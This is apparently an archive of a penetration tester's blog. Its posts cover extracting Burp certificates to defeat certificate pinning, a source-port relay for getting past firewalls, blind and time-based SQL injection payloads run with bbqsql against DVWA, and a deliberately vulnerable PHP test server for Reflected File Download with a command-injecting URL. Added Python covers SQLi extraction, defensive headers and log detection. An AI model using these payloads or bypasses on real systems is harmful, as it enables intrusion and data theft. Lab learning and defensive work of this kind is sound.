Extract SSL/TLS certificate from Burp Suite Proxy for implanting

Saturday, April 01, 2017

Sometimes you want to take the certificate that Burp Suite generates and place it somewhere else, e.g., into a mobile app to bypass certificate pinning.

Here is how to extract the certificate using Kali 2016 Rolling.

proxytunnel -p LOCAL_IP_BURP_LISTENING_ON:LOCAL_PORT_BURP_LISTENING_ON -d DOMAIN_YOU_WANT:443 -a 7000 & openssl s_client -connect localhost:7000 -showcerts </dev/null 2>/dev/null | openssl x509 -outform der > mycert.der

Options are :

  • LOCAL_IP_BURP_LISTENING_ON is the IP address that Burp Suite Proxy is set to listen on.
  • LOCAL_PORT_BURP_LISTENING_ON is the port that Burp Suite Proxy is set to listen on.
  • DOMAIN_YOU_WANT is the domain you want to spoof. This can also include subdomains and a wildcard (e.g., test.myuni.ac.uk or *.myuni.ac.uk).
  • mycert.der is the DER file generated. Don't forget to rename it to what the application is expecting.

For example:
proxytunnel -p 127.0.0.1:8080 -d '*.myUni.ac.uk:443' -a 7000 & openssl s_client -connect localhost:7000 -showcerts </dev/null 2>/dev/null | openssl x509 -outform der > mycert.der

Here my Burp Suite proxy is listening on 127.0.0.1 port 8080, *.myUni.ac.uk is the example domain I want on my cert (quoted so the shell does not expand the wildcard), and the output file is named mycert.der.

P.S.: Don't forget that if you are working with teammates, you can just as easily query their Burp Suite proxy.

-- 

If you want to check your results, you will need to convert from one format to the other. So convert DER to PEM:

openssl x509 -inform der -in mycert.der -out mycert.pem

And then inspect the certificate:

openssl x509 -in mycert.pem -text -noout
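The same extraction done without proxytunnel, as an added example that is not part of the original post: the script speaks HTTP CONNECT to the proxy itself, performs the TLS handshake inside the tunnel and saves the presented leaf certificate as both DER and PEM. Certificate verification is switched off on purpose, because the intercepting proxy's CA is not in the trust store and the whole point is to obtain whatever certificate it generates; the proxy uses the CONNECT host and the SNI name to decide which per-host certificate to present. The proxy address, hostname and output file names are placeholders; whether a wildcard name such as *.myuni.ac.uk is accepted as a CONNECT host is up to the proxy (the post reports it works with Burp).

```python
"""Fetch the certificate an intercepting proxy (such as Burp) presents for a
hostname: send an HTTP CONNECT to the proxy, then do a TLS handshake inside
the tunnel.  Added example, not from the original post; proxy address,
hostname and output file names are placeholders you supply."""
import socket
import ssl


def build_connect_request(host, port):
    """The HTTP CONNECT request that asks the proxy to open a tunnel to host:port."""
    return ("CONNECT %s:%d HTTP/1.1\r\nHost: %s:%d\r\n\r\n"
            % (host, port, host, port)).encode("ascii")


def connect_succeeded(reply):
    """True when the proxy's status line is a 2xx, e.g. 'HTTP/1.1 200 Connection established'."""
    status = reply.split(b"\r\n", 1)[0].decode("ascii", "replace").split()
    return len(status) >= 2 and status[0].startswith("HTTP/") and status[1].startswith("2")


def read_headers(sock):
    """Read the proxy's reply up to the blank line that terminates the headers."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("proxy closed the connection before answering CONNECT")
        buf += chunk
    return buf


def fetch_cert_via_proxy(proxy_host, proxy_port, target_host, target_port=443):
    """Return the DER-encoded leaf certificate the proxy serves for target_host."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # the proxy's CA is not trusted; we want its cert anyway
    with socket.create_connection((proxy_host, proxy_port), timeout=10) as raw:
        raw.sendall(build_connect_request(target_host, target_port))
        reply = read_headers(raw)
        if not connect_succeeded(reply):
            raise ConnectionError("CONNECT refused: %r" % reply.split(b"\r\n", 1)[0])
        # server_hostname sets the SNI; the proxy picks (or generates) the
        # certificate for that name, which is exactly what we are after
        with ctx.wrap_socket(raw, server_hostname=target_host) as tls:
            return tls.getpeercert(binary_form=True)


def der_to_pem(der):
    """DER (binary) to PEM (base64 between BEGIN/END CERTIFICATE lines)."""
    return ssl.DER_cert_to_PEM_cert(der)


def pem_to_der(pem):
    """PEM back to DER; the two functions round-trip."""
    return ssl.PEM_cert_to_DER_cert(pem)


def save_both(der, stem="mycert"):
    """Write stem.der and stem.pem; the .pem is what 'openssl x509 -text' reads directly."""
    with open(stem + ".der", "wb") as f:
        f.write(der)
    with open(stem + ".pem", "w") as f:
        f.write(der_to_pem(der))


if __name__ == "__main__":
    # placeholders: a local Burp listener and the hostname you want on the certificate
    cert = fetch_cert_via_proxy("127.0.0.1", 8080, "test.myuni.ac.uk")
    save_both(cert)
    print("saved %d DER bytes as mycert.der / mycert.pem" % len(cert))
```

After running it, openssl x509 -in mycert.pem -text -noout shows the subject and subject alternative names the proxy put in, which is the check worth doing before renaming the file to whatever the application expects.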


Burp Suite Portswigger - ssl-tls issue [solution]

Saturday, April 01, 2017

Burp Suite Portswigger standalone instance [solution]

Cheers to for the idea and useful tips: https://madmantm.wordpress.com/2015/04/08/burp-ssltls-interception-issues/

If you are having issues with intercepting SSL/TLS connections in Burp Suite on Mac OS X then try the following:

Download the Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files for Java 8 from:
http://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html

Copy the two policy files from the download:
local_policy.jar and US_export_policy.jar

into the security directory of the JRE bundled with Burp Suite:
/Applications/Burp Suite Professional.app/Contents/PlugIns/jre.bundle/Contents/Home/jre/lib/security

Listen and forward a connection by changing the source port - socat and netcat

Thursday, June 16, 2016

Listen and forward a connection by changing the source port - socat and netcat

Assume you want to connect to port 22 on a machine with the IP address 10.0.0.12, and that a source port of 53 will let you through the firewall. We will set up a listener on port 2323. Here are two methods you can try:

SOCAT
socat TCP4-LISTEN:2323,fork TCP-CONNECT:10.0.0.12:22,sp=53
ssh -p 2323 127.0.0.1
Listen on port 2323 and, for each connection, connect to the IP address on port 22 with the source port of the outgoing connection set to 53.


NETCAT (nc)
mkfifo myfifo
nc -p 53 10.0.0.12 22 < myfifo | nc -l -p 2323 > myfifo
ssh -p 2323 127.0.0.1
The second netcat listens on port 2323 and pushes what it receives into the fifo. Once you connect, the first netcat command does its work: it connects to the server on port 22 with the source port set to 53, taking its input from the fifo (myfifo) fed by the second command, while the server's replies flow back through the pipe to the listener.

Update: Works in Kali 2
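The same relay written out in Python, as an added example that is not part of the original post, to make the mechanism explicit: the only thing socat's sp=53 and netcat's -p 53 do is bind() the outbound socket to a chosen local port before connect(). That is also why firewall rules that trust traffic by source port (allowing "DNS replies" from port 53, say) are not a control worth relying on, and why connections from source port 53 that do not carry DNS are worth alerting on. All addresses and ports are placeholders; demo() runs the relay against a local echo server and records which source port the server actually saw, using unprivileged ports so it needs no root (binding a source port below 1024 does).

```python
"""A small TCP relay that listens locally and opens each upstream connection from
a fixed source port, which is what the socat and netcat one-liners above do.
Added example, not from the original post; addresses and ports are placeholders."""
import socket
import threading


def connect_from_source_port(target, source_port):
    """Open an outbound TCP connection whose local port is fixed before connecting."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", source_port))  # the whole trick: bind() picks the source port, connect() keeps it
    s.connect(target)
    return s


def pump(src, dst):
    """Copy bytes from src to dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle_client(client, target, source_port):
    """Relay one accepted client connection to target from the fixed source port."""
    with client, connect_from_source_port(target, source_port) as upstream:
        threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
        pump(upstream, client)


class Relay:
    """Accept connections on (listen_host, listen_port) and relay each one upstream."""

    def __init__(self, listen_port, target_host, target_port, source_port, listen_host="127.0.0.1"):
        self.target = (target_host, target_port)
        self.source_port = source_port
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((listen_host, listen_port))
        self.server.listen(5)
        self.listen_port = self.server.getsockname()[1]  # the real port when 0 was requested
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.server.accept()
            except OSError:
                return  # listening socket closed
            threading.Thread(target=handle_client,
                             args=(client, self.target, self.source_port), daemon=True).start()

    def close(self):
        self.server.close()


def free_port():
    """Ask the OS for a currently unused local port (stands in for 53 in the demo)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Constructed end-to-end run: a local echo server that records the peer port it
    saw, the relay in front of it, and one client round trip through the relay.
    Returns (bytes echoed back, source port the server saw, source port requested)."""
    seen = {}
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)

    def echo_once():
        conn, addr = server.accept()
        seen["port"] = addr[1]  # the source port of the relay's upstream connection
        with conn:
            conn.sendall(conn.recv(1024))

    threading.Thread(target=echo_once, daemon=True).start()
    wanted = free_port()
    relay = Relay(0, "127.0.0.1", server.getsockname()[1], wanted)
    try:
        with socket.create_connection(("127.0.0.1", relay.listen_port), timeout=5) as c:
            c.sendall(b"ping")
            c.shutdown(socket.SHUT_WR)
            reply = b""
            while True:
                chunk = c.recv(1024)
                if not chunk:
                    break
                reply += chunk
    finally:
        relay.close()
        server.close()
    return reply, seen.get("port"), wanted


if __name__ == "__main__":
    print(demo())
```

For the scenario in the post you would run Relay(2323, "10.0.0.12", 22, 53) as root and then ssh -p 2323 127.0.0.1, exactly as with the socat line.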

How to use bbqsql - Not so Blind and Blind SQLi

Sunday, February 28, 2016

Disclaimer: This information is provided for educational and professional use only.

What is needed :
bbqsql 1.1
Damn Vulnerable Web App (DVWA) v1.9
OWASP ZAP v2.4.3 / Burp

In this post I will be exploring how to make use of bbqsql by Neohapsis. bbqsql (https://github.com/Neohapsis/bbqsql) is a tool that can be used to conduct normal SQL injection and blind SQL injection. It first made its appearance at Defcon 20 (https://www.defcon.org/images/defcon-20/dc-20-presentations/Toews-Behrens/DEFCON-20-Toews-Behrens-BBQSQL.pdf).

After conducting a small search on Google I found very limited resources about it. I guess this in turn leads to the tool being used less than it deserves.

bbqsql can be found in Kali 2.0. Unfortunately the version that is shipped has a coding error, and it is advised to update to the newer version. My tests used bbqsql 1.1.

Download the new version as follows:
$ pip install --upgrade bbqsql
In my case it was installed in /usr/local/bin/bbqsql. You can simply delete the old version that resides in /usr/bin and copy over the one from /usr/local/bin/bbqsql:
$ whereis bbqsql
bbqsql: /usr/bin/bbqsql /usr/local/bin/bbqsql
$ cp /usr/local/bin/bbqsql /usr/bin/bbqsql
Check the version you have:
$ bbqsql -V
bbqsql 1.1
Before starting, make a note of the working directory. This is where your configuration is exported to and imported from.
$ pwd
/root/
$ bbqsql
Once you have the program up and running we need to go to DVWA and test the injection point. I will assume you have done the hard part and installed DVWA.

Login and downgrade the security difficulty level to low.

We will make use of the SQL Injection section first, because there we can see the results and so judge what a true and a false response look like. Once you have mastered this you can move on to the Blind SQLi section. We know from experience with DVWA that there is an injection point on the page 'SQL Injection'. A simple ' will cause the system to produce an error, and if we enter ' or '0'='0 we get all the users listed. So we will use this injection point to insert a substring and comparison statement. A nice breakdown of what it does is presented in the Defcon 20 PDF.

So let's test this query. Notice that it makes use of the user() function in MySQL (http://dev.mysql.com/doc/refman/5.7/en/information-functions.html). Once you have this working, any query can be used from there on. More MySQL commands can be found in various cheat sheets, such as http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet.

DVWA low security:

This query returns a number of results ('User ID exists in the database.' on sqli_blind):
' or ascii(substr(user(),1,1))>0 #
whereas the opposite returns none ('User ID is MISSING from the database.' on sqli_blind):
' or ascii(substr(user(),1,1))<0 #
These can be used to create the query template. Based on the examples provided these become:

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

In this case we will use the variation in the content to identify a true or false statement.

Let's have a look at what options we need to set in the first set. Option 1 'Setup HTTP Parameters' has a number of options. Let's focus on the ones we will be using.

Fig.1 - Setup HTTP Parameters

Option 2 'cookies' will be used to set the cookies. Make sure to set the right values, otherwise you will get the wrong results back. DVWA looks at the cookie value sent to set the security level before processing the request. I copied mine from ZAP.
'security': 'low', 'PHPSESSID': '0dfr898d44oh55movkfgrtfts7'
Next set the correct URL with the correct injection point. Remember the program supports a number of injection points: URL, cookie and data (check the slides for examples). Again use ZAP or tcpdump etc. to get the correct URL and arguments. In this case it is:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
This is then changed to include the injection point:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1${injection}&Submit=Submit#
Option 5 'proxies' can be useful for debugging by using OWASP ZAP or Burp:
{"http": "127.0.0.1:8080"}
Option 7 'method'
get
Go back using '99' or 'done'
99
Option 2 'Setup BBQSQL Options' is where we setup the programs functionality.

Option 1 'technique' sets the technique; we will leave it at binary_search. Remember that if you enter a menu you need to set a value: pressing Enter sets a NULL value.

Option 2 'comparison_attr' will be used quite often. Have a look at the different options. For now we will set it to content, as we know the page content changes between a true and a false result.
content
Finally, Option 5 'query' will hold our custom query. This is the one we created above.


bbqsql will make a number of test attempts and report its results. If these are successful it will print them out and ask whether you want to continue.

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

Fig. 2 - Setup BBQSQL Options (time-based) 

Once it is all setup exit 'Setup BBQSQL Options' and get ready to run bbqsql.
99
Because the program may crash, it is advised that you save your settings.
Once you have exported (i.e., saved) your config you can attempt to run it. This is done with Option 5 'Run Exploit' from the main menu.
5
If this works you will start to see the user and the IP address/hostname:
['root@localhost']

In the images I have provided you will have noticed that the commands are different: I also did a demo of a time-based attack. The templates for it can be found below. Passing bbqsql through ZAP/Burp will allow you to better understand how it finds the data.

Fig. 3 - Execution and results of initial tests (time-based attack)

Fig. 4 - Extraction Results and Statistics


Fig. 5 - Final Results and Main Menu

Time-based Blind SQL Injection examples:

A simple function call example (I had to add ',1' as I was getting column-count errors; I checked this by entering it manually in the browser):

' UNION SELECT IF(ascii(substr(user(),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template:

' UNION SELECT IF(ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

A more advanced select query (here it uses an offset to pick the row):

' UNION SELECT IF(ascii(substr((SELECT user FROM mysql.user LIMIT 1 OFFSET 1),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template (I have added ${sleep:50000}, but I have noticed it is not very effective as a variable). This 'time' method is faster compared to 'content' checking:

' UNION SELECT IF(ASCII(SUBSTR(( SELECT user FROM mysql.user LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #

Another query template example:

' UNION SELECT IF(ASCII(SUBSTR(( SELECT column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #

Try getting the same results with DVWA medium security and above.
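To see what bbqsql is actually doing with the ${char_index}, ${comparator} and ${char_val} placeholders in the content-based template above (and in the time-based ones), here is the extraction loop written out as an added example; it is not bbqsql's own code. It fills the post's template, asks a yes/no oracle "is this character's ASCII code greater than mid?" and binary-searches each character; the "database" is an in-memory stand-in that answers the rendered comparison the way MySQL's ASCII(SUBSTR(user(),i,1)) would, including the fact that SUBSTR past the end of the string gives '' and ASCII('') is 0, which is how the loop knows the value has ended. A time-based oracle changes only how true and false are observed (a delay instead of a content difference); the search itself is identical.

```python
"""How a yes/no injection oracle is turned into data: fill the ${name:default}
template, binary-search each character's ASCII code.  Added example, not
bbqsql's own code; the oracle is a simulation, not a network request."""
import re

# the content-based template from the post
PAGE_TEMPLATE = "' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #"
PLACEHOLDER = re.compile(r"\$\{(\w+)(?::([^}]*))?\}")


def render(template, **values):
    """Substitute ${name:default} placeholders; an explicit value overrides the default."""
    def one(match):
        name, default = match.group(1), match.group(2)
        if name in values:
            return str(values[name])
        if default is None:
            raise KeyError("no value or default for placeholder " + name)
        return default
    return PLACEHOLDER.sub(one, template)


def simulated_oracle(secret):
    """Stand-in for the DVWA page: parse the rendered comparison and answer it as
    MySQL would for user() == secret."""
    pattern = re.compile(r"SUBSTR\(user\(\),(\d+),1\)\)(>|<|=)(\d+)")

    def oracle(query):
        m = pattern.search(query)
        if not m:
            raise ValueError("query does not match the template: " + query)
        idx, comparator, value = int(m.group(1)), m.group(2), int(m.group(3))
        code = ord(secret[idx - 1]) if idx <= len(secret) else 0  # ASCII('') is 0
        return {">": code > value, "<": code < value, "=": code == value}[comparator]
    return oracle


def extract_char(oracle, template, char_index, lo=0, hi=127):
    """Binary-search one character code with 'code > mid' questions.
    Returns (code, number of queries); for the 0..127 range that is always 7."""
    queries = 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(render(template, char_index=char_index, comparator=">", char_val=mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo, queries


def extract_string(oracle, template, max_len=256):
    """Extract characters left to right until ASCII 0 marks the end.
    Returns (value, total queries)."""
    chars, total = [], 0
    for i in range(1, max_len + 1):
        code, n = extract_char(oracle, template, i)
        total += n
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars), total


if __name__ == "__main__":
    value, n = extract_string(simulated_oracle("root@localhost"), PAGE_TEMPLATE)
    print("%s recovered with %d requests" % (value, n))
```

The request count is the detection angle: recovering root@localhost costs 7 near-identical requests per character (15 characters including the terminating check, 105 requests), each differing from the last only in the two numbers, which is a pattern that stands out in access logs or in a WAF's per-parameter view. The fix on the application side is parameterised queries, which is what DVWA's higher security levels move towards.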

Hardsploit - RaspberryPi 2 with Kali 2

Friday, February 05, 2016

It seems it is possible to get the Hardsploit (https://hardsploit.io/) application GUI version 2.0 running on a Raspberry Pi 2 that runs Kali 2.1. A GUI is needed; in this case it is Xfce.

What you need to know is that this Kali 2.1 install is missing a few libraries. Unfortunately I installed too many while figuring out which ones were actually needed. I will pick out a few which I really think helped in the end. If there are any others missing please add a comment. In the end I got the libraries to install and the application starts up.
apt-get install build-essential
apt-get install ruby ruby-dev ruby-qt4
As shown by Opale Security (https://github.com/OPALESECURITY/hardsploit-gui/wiki/installation-procedure), the rest of the commands are the same as usual:
apt-get install cmake libsqlite3-dev dfu-util
gem install qtbindings activerecord libusb sqlite3
gem install hardsploit_gui 
hardsploit_gui
Some lessons learnt so far:

  1. The software is buggy; it is a work in progress. Expect it to crash. Make sure you save what you are doing, often.
  2. It is a good idea to make a backup copy of the database file. The file path can be found by going to About->Path->Database file. We did a reinstall of hardsploit_gui and it removed the database. You have been warned.
  3. Dumping is very fast compared to other solutions out there. We did a firmware dump of 4 MB in 17.4 seconds at 25 MHz.
  4. If you are having issues with the board and the lights are dimming and seem weak, a firmware update (via the bootloader) can fix it. It did for us, at least. (Updated: 06/02/2016)


More to follow... (05/02/2016)

Stonesoft Firewall/IPS: expired certificate errors

Wednesday, April 29, 2015

If you have a Stonesoft Firewall or IPS and are having issues connecting to the Management and/or Log Server, it is quite possible that the certificates have expired. There is a way to fix it.

Try the following:

On the Management Server in the Stonegate folder ../stonegate/bin there are a number of scripts to re-issue the required certificates.

Shut down the Management Server (first stop the service, if it is running):
sudo -u sgadmin sgStopMgtSrv.sh

Reset the certificate for the Management Server:
sudo -u sgadmin sgCertifyMgtSrv.sh
Start the service again, either reboot or:
sudo -u sgadmin sgStartMgtSrv.sh &


On the Log Server in the Stonegate folder ../stonegate/bin there are a number of scripts to re-issue the required certificates.

Shut down the Log Server (first stop the service, if it is running):
sudo -u sgadmin sgStopLogSrv.sh
Reset the certificate for the Log Server:
sudo -u sgadmin sgCertifyLogSrv.sh
Start the service again, either reboot or:
sudo -u sgadmin sgStartLogSrv.sh &


And that is it. Start up your Management console via ./sgClient.sh & and you should be able to connect.

Your Firewall/IPS won't be able to connect anymore, since the fingerprint will have changed. This means the new settings have to be pulled by the devices. The way I sorted it out was to SSH into the Firewall and issue the sg-reconfigure command.

You will now need a one-time password from the Management Console. It can be retrieved by selecting the device under Firewalls or IPS, right-clicking on it and selecting Configuration -> Save Initial Configuration from the menu. In the new window named Save Initial Configuration a new one-time password will be generated and the SSL fingerprint will also be shown.

Once you have the one-time password, move over to the sg-reconfigure command on the Firewall/IPS and skip all the steps until you reach the one-time password prompt (select Next->). Select Contact Management Server or the equivalent, enter the one-time password provided by the Management Center, and either enter the new fingerprint or leave it out, as it is not required by default.


Errors usually include:
Log Server doesn't have any usable certificate.
Caused by: java.security.cert.CertificateExpiredException: NotAfter: date_here



Reflected File Download - test server details in Kali or any Linux distro with PHP

Monday, November 03, 2014

I am sure you have heard about Reflected File Download (RFD) by now [1, 2]. I wanted to set up a server to play around with what this would look like.

First we need a JSON endpoint that reflects user-supplied input. This was achieved in Kali (assumed here to have the IP address xxx.xxx.xxx.xxx) by creating a file called index.php in the folder /var/www/s/ with the following code:
<?php
class testdata {
        public $data1 = "";
        public $data2 = "";
        public $data3 = "";
        public $url_search = "";
}
$data_ = new testdata();
$data_->data1 = "foo";
$data_->data2 = "bar";
// the user-supplied value is reflected into the response body unfiltered
$data_->url_search = isset($_GET['url_search']) ? $_GET['url_search'] : "";
// the Content-Type header is deliberately left out on this test server
//header("Content-Type: application/json");
// no filename is given, so the browser takes one from the URL path
header("Content-Disposition: attachment;");
echo json_encode($data_);
?>
If the code does not run, try setting it as executable and setting the correct owner:
chmod +x index.php
chown www-data:www-data index.php
Once the web page returns a file it should be working correctly. Ideally the file returned should contain the JSON response. My tests did not manage to make use of the semicolon (;): the Apache2 logs kept saying that the file /s; was not found. This means everything after the semicolon was ignored, but it was still included in the request, causing problems. I found that just providing the file name after index.php works in Firefox.

Now try injecting the command you desire.
http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||
This was tested on IE6 on Windows XP SP2, Chrome 38.0.2125.111 on Mac OS X and Firefox 33.0.2. The above link only worked in Firefox 33.0.2.

As described in the white paper [2], it is also possible to provide a link that downloads the file instead of showing the result in the page. This can be tested by saving the following in a page called index2.php, and by commenting out header("Content-Disposition: attachment;"); in index.php with //.

<a download="" href="http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||">hello</a>
This is very reliant on the browser, as they all react differently when sending the request. The point of this post is to get everyone trying out the attack vector.

Happy testing!
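Two defensive pieces for the set-up above, as an added example that is not part of the original post: the response headers that stop a reflecting JSON endpoint from being saved under a name of the requester's choosing, and a check over web-server access-log lines for the request shape the test URL uses (an executable file name smuggled in as path-info after index.php, shell separators in the reflected parameter). Note that JSON escaping of the quote does not neutralise the payload (the '||' separators survive inside the string); what closes the hole is a server-chosen filename in Content-Disposition, a real Content-Type with nosniff, and not accepting path-info. The log lines are constructed, with the first one carrying the post's own test URL.

```python
"""Hardened response headers for a reflecting JSON endpoint, and an RFD indicator
check over access-log lines.  Added example, not from the original post; the
sample log lines are constructed."""
import json
import re
from urllib.parse import unquote, urlsplit

EXECUTABLE_EXT = (".bat", ".cmd", ".exe", ".ps1", ".vbs", ".hta", ".sh")


def safe_json_response(payload, filename="data.json"):
    """Return (headers, body) for a JSON reply that browsers will save as data.json
    with a fixed type, whatever the URL path says."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",  # no content sniffing into another type
        "Content-Disposition": 'attachment; filename="%s"' % filename,  # name is ours
    }
    return headers, json.dumps(payload)


LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# a script name followed by a further path segment, e.g. /s/index.php/test.bat
PATH_INFO = re.compile(r"\.(?:php|aspx?|jsp|cgi)(/[^/]*)$", re.IGNORECASE)
SHELL_SEPARATORS = re.compile(r"\|\||&&")


def rfd_indicators(log_line):
    """Return the RFD indicators found in one access-log line (empty list if none)."""
    m = LOG_LINE.match(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    path, query = unquote(url.path), unquote(url.query)
    findings = []
    tail = PATH_INFO.search(path)
    if tail and tail.group(1).lower().endswith(EXECUTABLE_EXT):
        findings.append("executable file name via path-info: " + tail.group(1))
    if SHELL_SEPARATORS.search(query):
        findings.append("shell command separators in query string")
    return findings


def scan(lines):
    """(client ip, request target, indicators) for every line that has indicators."""
    hits = []
    for line in lines:
        found = rfd_indicators(line)
        if found:
            m = LOG_LINE.match(line)
            hits.append((m.group("ip"), m.group("target"), found))
    return hits


# constructed Apache-style log lines; the first is the post's test URL
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Nov/2014:10:15:01 +0000] "GET /s/index.php/test.bat?url_search=%22||dir%3ew|| HTTP/1.1" 200 84',
    '203.0.113.8 - - [03/Nov/2014:10:15:04 +0000] "GET /s/index.php?url_search=shoes HTTP/1.1" 200 61',
    '203.0.113.9 - - [03/Nov/2014:10:15:09 +0000] "GET /s/index.php/report.json?url_search=a%26%26b HTTP/1.1" 200 61',
]

if __name__ == "__main__":
    for ip, target, found in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(found))
    print(safe_json_response({"url_search": '"||dir>w||'})[0])
```

In the PHP test server the equivalent fix is to restore the Content-Type header, send header('Content-Disposition: attachment; filename="data.json"') and add header('X-Content-Type-Options: nosniff'); on Apache, AcceptPathInfo Off additionally makes the /index.php/test.bat form a 404, so the file name can no longer be chosen from the URL at all.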

References:
[1] - Spiderlabs.com - Reflected File Download - A New Web Attack Vector - http://blog.spiderlabs.com/2014/10/reflected-file-download-the-white-paper.html
[2] - White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif [Hosted on Google Drive] - https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view